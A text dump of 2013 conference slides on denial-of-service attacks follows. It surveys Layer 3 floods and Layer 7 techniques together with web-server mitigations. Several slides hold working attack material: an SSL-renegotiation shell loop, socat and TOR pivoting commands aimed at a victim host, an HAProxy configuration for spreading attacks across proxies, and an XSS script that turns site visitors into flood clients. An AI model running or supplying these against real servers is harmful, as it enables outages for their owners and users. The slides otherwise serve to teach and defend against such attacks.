The document discusses denial-of-service (DoS) attacks and their targets at different layers of the OSI model. Layer 3 attacks target bandwidth consumption through techniques like ping floods and SYN floods. Layer 7 attacks target application resources through vectors like SSL handshake renegotiation to cause intense CPU usage on the server. The document outlines how Layer 7 attacks are more stealthy and efficient at causing damage than Layer 3 attacks.
2. $ whoami
Full Name: Jan
Origin: Rio de
Seidl
Janeiro, RJ – Brazil
Work:
● Technical Coordinator @ TI Safe
●
● OpenSource contributor for: PEV, Logstash
●
● Codes and snippets @ github.com/jseidl
●
Features:
● UNIX Evangelist/Addict/Freak (but no fanboy!)
●
● Python and C lover
●
● Coffee dependent
●
● Hates printers and social networks
●
● Proud DC Labs Member
●
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
3. agenda
0x0
0x1
0x2
0x3
0x4
0x5
0x6
0x7
0x8
0x9
0xA
Introduction to Denial-of-Service
Background: Layer 3 attacks
Attacking Layer 7: Fundamentals
Attacking Layer 7: Vectors & Tools
WebServer DoS Mitigation 101
Proxies (SOCKS/TOR) and Layer 7 attacks
Jericho Attack Technique: Load-balancing attacks
XSS D/DoS
Size doesn't matter: Mobile-launched Denial-of-Service
Demo/Video: GoldenEye MdoS Android Tool
Questions?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
4. Introduction to Denial-of-Service
What is denial of service?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
5. Introduction to Denial-of-Service
What is denial of service?
A denial-of-service attack (...), is an attempt to
make a machine or network resource
unavailable to its intended users.
Source: Wikipedia/en_US
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
6. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
7. Introduction to Denial-of-Service
Result?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
8. Introduction to Denial-of-Service
Result?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
9. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
10. Introduction to Denial-of-Service
Symptoms
Oddly low performance
Unavailability of given resource
Unavailability of all resources
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
11. Introduction to Denial-of-Service
Recent Cases
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
13. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
18. Introduction to Denial-of-Service
Targets (OSI layer)
Network (Layer 3)
Bandwidth consumption
Application (Layer 7)
Application or operating system resources consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
19. Introduction to Denial-of-Service
Network (Layer 3)
Bandwidth consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
20. Background: Layer 3 attacks
Popular Attacks
Ping Flood
(…) is a simple denial-of-service attack where the attacker
overwhelms the victim with ICMP Echo Request (ping)
packets (...) The attacker hopes that the victim will respond
with ICMP Echo Reply packets, thus consuming both
outgoing bandwidth as well as incoming bandwidth.
Source: Wikipedia/en_US
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
21. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
22. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
23. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
24. Background: Layer 3 attacks
Popular Attacks
SYN Flood
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
25. Background: Layer 3 attacks
Popular Attacks
SYN Flood
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
26. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
“When the sum of the offset and size of one fragmented
packet differ from that of the next fragmented packet, the
packets overlap, and the server attempting to reassemble
the packet can crash, especially if it is running an older
operating system that has this vulnerability.”
http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
27. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
28. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
29. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
30. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
31. Attacking Layer 7: Fundamentals
Application (Layer 7)
Application or operating system resources consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
32. Attacking Layer 7: Fundamentals
Focus
Layer 3
Layer 7
Exhaust
bandwidth
Exhaust application or
operating system keyresources
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
33. Attacking Layer 7: Fundamentals
Stealthness
Layer 3
Layer 7
High network noise
(noisy attack)
Low network noise, might
emulate legit requests
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
34. Attacking Layer 7: Fundamentals
Efficiency
Layer 3
Layer 7
Requires lot of participants
for significant outage. May
be blocking by sparring
Sometimes only one
machine can cause damage.
Difficult to block
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
35. Attacking Layer 7: Fundamentals
Mitigation
Layer 3
Layer 7
Large link, connectionlimiting, rate-limiting,
sparring
?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
36. Attacking Layer 7: Fundamentals
Layer 7 attacks targets
Intense CPU, Disk I/O & Swapping operations,
long/slow/complex queries
Finite application resources: Maximum Sockets Limits, Maximum
Memory Limits, Disk space etc
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
37. Attacking Layer 7: Vectors & Tools
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
38. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
15% more processing power needed on server
than on client to establish handshake.
On the wild since 2003.
Still affects most implementations.
Found by THC group (ww.thc.org) in 2011
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
39. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Tool:
THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>
- or thcssldosit() { while :; do (while :; do echo R;
done) | openssl s_client connect 127.0.0.1:443
2>/dev/null; done }
for x in `seq 1 100`; do thcssldosit & done
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
40. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Affects any TLS/SSL secured protocol:
HTTPS, SMTPS, POP3S, Database secure ports etc
Mitigation?
Turning off SSL renegotiation might help, but not solve
SSL accelerators might help, but also don't 100% solve
IPTables mitigation
http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
41. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Parallel requests of small GZIP'ed content parts
Forces the webserver to perform several parallel compression
operations = high load
Discovered in 2011 (CVE-2011-3192)
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
42. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Tools:
killapache.pl <
http://seclists.org/fulldisclosure/2011/Aug/175>
Slowhttptest <http://code.google.com/p/slowhttptest/>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
43. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Mitigation:
SetEnvIf or mod_rewrite
(ref: http://httpd.apache.org/security/CVE-2011-3192.txt)
Use a WAF (Web Application Firewall)
Update Apache to version 2.2.21 or greater
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
44. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers, Slow Post, Slow Read
Read or send data in small chunks, with interval
between reads / writes.
Waiting for the full request is part of the Web Server's
nature
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
45. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
Slow Post: send request post body (post data) 'Slowly'
Slow Read: Small TCP window size to force slow response
reading
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
46. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
GET / HTTP/1.1 rn /* sleep(1) */
Connection: keep-alive rn /* sleep(1) */
...
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
47. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Post: send request post body (post data) 'Slowly'
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Accept: text/html;q=0.9,text/plain;q=0.8
foo=bar /* sleep(1) */
bar=baz /* sleep(1) */
baz=foo /* sleep(1) */
...
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
48. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Read: Small TCP window size to force slow response
reading
/* pseudocode */
int len = 1;
while (data = read(sock, buffer, len)) {
sleep(5);
…
}
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
49. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Tools:
Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post
Tool
Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool
Slow Read: slowhttptest
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
50. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks - Mitigation:
Slow Headers: request timeout (apache's
mod_reqtimeout), WAF
Slow Post: request timeout, WAF
Slow Read: Disable pipelining and oddly slow window sizes,
limit maximum request request time, WAF
Good article on slow attacks mitigation
https://community.qualys.com/blogs/securitylabs/2011/11/02
/how-to-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
51. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache
Keep connections open and force cache regeneration.
First POC:
HULK – HTTP Unbearable Load King
Created on May 2012 by Barry Shteiman.
<http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
52. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache: HULK
Highly effective against IIS, Apache & Reverse Proxies
Caveat: Python, Urllib2 → Always sends headers on the
same order
Spiderlabs: modsecurity rule to mitigate URLLib attacks (Hulk)
(http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
53. Attacking Layer 7: Vectors & Tools
Randomization FTW!
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
54. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
●
●
●
●
Author: Me! :)
Initially born as a Hulk fork due to its fingerprinting weakness
●
●
Transformed further into a new independent HTTP DoS Tool
Born to test WAF blocking abilities under random and semi-natural
payloads
Available at https://github.com/jseidl/GoldenEye
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
55. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
Main Features:
GET, POST or Random HTTP methods
Random headers quantity
Random Headers content with legit values as per RFC
Better random block function to avoid fingerprinting
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Hackers to Hackers Conference 2012 – São Paulo, Brasil
Hackers to Hackers Conference 2012 – São Paulo, Brasil
56. Attacking Layer 7: Vectors & Tools
Mitigation
Granular page permissions
Filter POST where not needed
Filter querystring parameters where not needed
ProxyCache
Use caching proxies (ex: Varnish) and disable cache reload
KeepAlive e TimeOuts
Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and
equivalent in other webservers
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Hackers to Hackers Conference 2012 – São Paulo, Brasil
Hackers to Hackers Conference 2012 – São Paulo, Brasil
57. WebServer DoS Mitigation 101
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
58. WebServer DoS Mitigation 101
Apache
LimitRequestFields, LimitRequestFieldSize,
LimitRequestBody, LimitRequestLine,
LimitXMLRequestBody, TimeOut,
KeepAliveTimeOut, ListenBackLog,
MaxRequestWorkers [core]
RequestReadTimeout [mod_reqtimeout]
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
59. WebServer DoS Mitigation 101
Nginx
client_max_body_size, client_body_buffer_size,
client_header_buffer_size,
large_client_header_buffers, client_body_timeout,
client_header_timeout [core]
Modules: HttpLimitReqModule,
HttpLimitZoneModule
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
60. WebServer DoS Mitigation 101
IIS 6 & 7
IIS 6: connectionTimeout, HeaderWaitTimeout,
MaxConnections
IIS 7: <RequestLimits> maxAllowedContentLength,
maxQueryString, maxUrl
<headerLimits>
<Limits>/<WebLimits> connectionTimeout,
headerWaitTimeout, minBytesPerSecond
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
61. WebServer DoS Mitigation 101
USE A WEB APPLICATION FIREWALL (WAF)
Modsecurity (Apache / Nginx)
http://www.modsecurity.org/
NAXSI (Nginx)
http://code.google.com/p/naxsi/
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
62. Proxies and Layer 7 attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
63. Proxies and Layer 7 attacks
Layer 3
Layer 7
Bad to attack through
proxies as they usually
have low bandwidth and
you might get banned
from them
Requires low bandwidth
Low network noise
Not degraded by low
output
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
64. Proxies and Layer 7 attacks
Why use proxies in HTTP attacks?
Simple answer
Geographic location at your will
Different source IPs
Can provide high anonymity
Largely available on the internet
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
65. Proxies and Layer 7 attacks
Attack pivoting by proxies
Tool:
Socat: Multipurpose Relay
http://www.dest-unreach.org/socat/
Also with SSL support:
HTTPS, IMAPS, POPS, LDAPS
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
66. Proxies and Layer 7 attacks
Attack pivoting by proxies: Regular Proxies
# socat TCP4LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
67. Proxies and Layer 7 attacks
Attack pivoting by proxies: TOR
# socat TCP4LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
68. Proxies and Layer 7 attacks
Bônus: Multi-TOR
The TOR client supports spawning as many instances and
opening as many circuits as necessary.
tor RunAsDaemon 1 CookieAuthentication 0
HashedControlPassword "pwd" ControlPort 4444
PidFile torN.pid SocksPort 5090 DataDirectory
data/torN
Tool:
Multi-TOR
https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instances
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
69. Proxies and Layer 7 attacks
Mitigating TOR with TORBlock
Blocking TOR-sourced access
TORBlock: IPTables-based blocking
Tool:
https://github.com/jseidl/torblock
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
70. Load Balancing Attacks
Meet Jericho
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
71. Load Balancing Attacks
Starring: HAProxy
“The Reliable, High Performance TCP/HTTP Load Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
72. Load Balancing Attacks
'Load-balanced' attacks anatomy
Attacker:
1. Open lots of socat tunnels to the victim, each one
from a different proxy (regular, TOR or both)
2. Put local port addresses (socat'ed ones) on
HAProxy
3. Place victim's domain on /etc/hosts
4. Attack normally from your favorite tool
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
73. Load Balancing Attacks
'Load-balanced' attacks anatomy
listen ddos 0.0.0.0:80
mode tcp
balance roundrobin
server inst1 localhost:8080
server inst2 localhost:8081
server inst3 localhost:8082
server inst4 localhost:8083
…
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
74. Load Balancing Attacks
'Load-balanced' attacks anatomy
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
75. Load Balancing Attacks
'Load-balanced' attacks anatomy
Proxy 1
Proxy 2
Attacker
HAProxy
Proxy 3
Proxy 4
Victim
Proxy 5
Proxy 6
Proxy 7
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
76. Load Balancing Attacks
'Load-balanced' attacks anatomy
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
77. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
●
●
Bypass connection-limiting
●
●
●
●
●
●
DoS → DDoS
Mutiple origin IPs
Origins can be from multiple countries
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
78. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
79. Load Balancing Attacks
More about the Jericho Attack Technique
http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
80. XSS D/DoS
What if an XSS flaw could turn your visitors into D/DoS
clients?
<script>
function DDoS() {
a = new Date()
unixepoch = a.getTime()
}
elm = document.createElement("img")
victimURL = "http://10.1.1.114/"
elm.src = victimURL+"?"+unixepoch
setInterval("DDoS()",1);
</script>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
81. Mobile-launched Denial-of-Service
PoC Tool: GoldenEye Mobile
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
